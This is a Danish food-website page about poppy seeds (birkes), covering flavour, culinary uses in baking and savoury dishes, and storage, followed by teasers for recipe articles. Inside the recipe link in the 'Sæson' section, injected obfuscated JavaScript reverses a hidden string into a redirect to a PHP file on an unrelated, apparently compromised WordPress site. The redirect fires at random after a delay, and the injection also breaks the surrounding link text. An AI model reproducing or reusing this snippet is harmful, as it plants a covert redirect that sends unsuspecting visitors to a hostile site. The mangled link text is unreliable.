Birkes smager lidt i retning af sesam men med lidt mere sødme og en let metallisk eftersmag.

Sæson
Fås hele året.

Prøv fx Anne Au Chocolats opskrift på $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andelvafler-birkes-citron/”>Mandelvafler med birkes og citron

Anvendelse
Birkesfrø stammer fra samme plante, som man laver opium af, nemlig opiumsvalmuen, men frøene har ingen narkotiske virkning. Der findes både lyse, brune og blåsorte birkes, sidstnævnte er de mest interessante i kulinarisk sammenhæng. Herhjemme bruger vi som oftest birkes som et aromatisk og dekorativt drys på brød, måske indpireret af jødiske bagere, som strøede birkes på brødet til sabbatten. Men i Tyskland og i Østeuropa bruges birkes i helt anderledes rundhåndede mængder. Tyskerne bager fx saftige birkeskager med flere hundrede gram birkes i hver kage, og i Østrig er birkes hovedingrediensen i mohntorte. Birkes tilfører brødet eller kagen saftighed og lidt fedme, da de indeholder meget olie. De små kuglerunde frø bidrager også til konsistensen, da de knaser lidt mellem tænderne. Man kan putte birkes i remonce i kagedej eller bage en nærmest konfektagtig kage pakket med birkes. Men birkes kan også bruges i det salte køkken, de små frø kan fx drysses over bagte rodfrugter, dampede grøntsager, fisk eller salater. Madskribenten Christa Alstrup anbefaler desuden at putte birkes i pastadejen og udrulle metervis af sortprikket pasta, som smager dejligt med brunet smør og parmesanost. For at fremhæve birkessmagen, kan man riste frøene let på en varm pande eller mase dem lidt i en morter.

Opbevaring
Tørt.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere